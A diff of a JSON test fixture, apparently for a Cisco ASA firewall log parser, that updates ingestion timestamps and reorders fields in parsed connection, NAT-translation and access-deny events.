@@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603963900Z", + "ingested": "2021-12-14T14:37:05.575485655Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603967700Z", + "ingested": "2021-12-14T14:37:05.575485987Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603972300Z", + "ingested": "2021-12-14T14:37:05.575486319Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603978200Z", + "ingested": "2021-12-14T14:37:05.575486654Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603983700Z", + "ingested": "2021-12-14T14:37:05.575486981Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603987600Z", + "ingested": "2021-12-14T14:37:05.575487315Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603991900Z", + "ingested": "2021-12-14T14:37:05.575487650Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603995400Z", + "ingested": "2021-12-14T14:37:05.575487983Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603999900Z", + "ingested": "2021-12-14T14:37:05.575488465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", @@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604005800Z", + "ingested": "2021-12-14T14:37:05.575488807Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", 
@@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604011600Z", + "ingested": "2021-12-14T14:37:05.575489137Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604017500Z", + "ingested": "2021-12-14T14:37:05.575489475Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604023500Z", + "ingested": "2021-12-14T14:37:05.575489958Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604029300Z", + "ingested": "2021-12-14T14:37:05.575490787Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", @@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604035200Z", + "ingested": "2021-12-14T14:37:05.575491150Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", 
@@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604041Z", + "ingested": "2021-12-14T14:37:05.575491492Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604046800Z", + "ingested": "2021-12-14T14:37:05.575491830Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604052600Z", + "ingested": "2021-12-14T14:37:05.575492176Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604058300Z", + "ingested": "2021-12-14T14:37:05.575492508Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604064100Z", + "ingested": "2021-12-14T14:37:05.575492839Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604070Z", + "ingested": "2021-12-14T14:37:05.575493183Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604093600Z", + "ingested": "2021-12-14T14:37:05.575493517Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604115100Z", + "ingested": "2021-12-14T14:37:05.575493861Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604119200Z", + "ingested": "2021-12-14T14:37:05.575494242Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604123500Z", + "ingested": "2021-12-14T14:37:05.575494581Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", 
@@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604128200Z", + "ingested": "2021-12-14T14:37:05.575494918Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604132800Z", + "ingested": "2021-12-14T14:37:05.575495249Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604136400Z", + "ingested": "2021-12-14T14:37:05.575495575Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604140600Z", + "ingested": "2021-12-14T14:37:05.575495912Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604146Z", + "ingested": "2021-12-14T14:37:05.575496235Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", 
@@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604151100Z", + "ingested": "2021-12-14T14:37:05.575496570Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604154700Z", + "ingested": "2021-12-14T14:37:05.575496903Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604158400Z", + "ingested": "2021-12-14T14:37:05.575497240Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5854,7 +5851,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604161700Z", + "ingested": "2021-12-14T14:37:05.575497570Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604165800Z", + "ingested": "2021-12-14T14:37:05.575497895Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604171300Z", + "ingested": "2021-12-14T14:37:05.575498222Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6063,25 +6060,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604177Z", + "ingested": "2021-12-14T14:37:05.575498671Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604182400Z", + "ingested": "2021-12-14T14:37:05.575499006Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6157,25 +6154,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604187800Z", + "ingested": "2021-12-14T14:37:05.575499337Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604193200Z", + "ingested": "2021-12-14T14:37:05.575499674Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6251,25 +6248,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6279,12 +6273,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604198500Z", + "ingested": "2021-12-14T14:37:05.575500004Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6298,7 +6295,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6362,7 +6362,7 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604204Z", + "ingested": "2021-12-14T14:37:05.575500333Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6447,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.604209400Z", + "ingested": "2021-12-14T14:37:05.575500682Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -6529,7 +6529,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604214700Z", + "ingested": "2021-12-14T14:37:05.575501045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6608,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604220100Z", + "ingested": "2021-12-14T14:37:05.575501387Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6691,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604225400Z", + "ingested": "2021-12-14T14:37:05.575501718Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6772,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604230800Z", + "ingested": "2021-12-14T14:37:05.575502049Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6853,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604236200Z", + "ingested": "2021-12-14T14:37:05.575502381Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -6934,7 +6934,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604241500Z", + "ingested": "2021-12-14T14:37:05.575502711Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +7015,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604246900Z", + "ingested": "2021-12-14T14:37:05.575503070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7096,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604252200Z", + "ingested": "2021-12-14T14:37:05.575503484Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7177,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604257700Z", + "ingested": "2021-12-14T14:37:05.575503867Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7258,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604261500Z", + "ingested": "2021-12-14T14:37:05.575504198Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7339,7 +7339,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604265800Z", + "ingested": "2021-12-14T14:37:05.575504528Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7420,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604270500Z", + "ingested": "2021-12-14T14:37:05.575504855Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7501,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604276700Z", + "ingested": "2021-12-14T14:37:05.575505191Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7582,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604280200Z", + "ingested": "2021-12-14T14:37:05.575505532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7663,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.604284500Z", + "ingested": "2021-12-14T14:37:05.575505889Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7744,7 +7744,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604289900Z", + "ingested": "2021-12-14T14:37:05.575506224Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7823,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604294900Z", + "ingested": "2021-12-14T14:37:05.575506563Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7906,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604298500Z", + "ingested": "2021-12-14T14:37:05.575506904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7985,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604302700Z", + "ingested": "2021-12-14T14:37:05.575507232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +8070,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604306300Z", + "ingested": "2021-12-14T14:37:05.575507569Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", 
@@ -8153,7 +8153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604310800Z", + "ingested": "2021-12-14T14:37:05.575507900Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8238,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604315900Z", + "ingested": "2021-12-14T14:37:05.575508241Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8320,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604320300Z", + "ingested": "2021-12-14T14:37:05.575508576Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8399,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604325700Z", 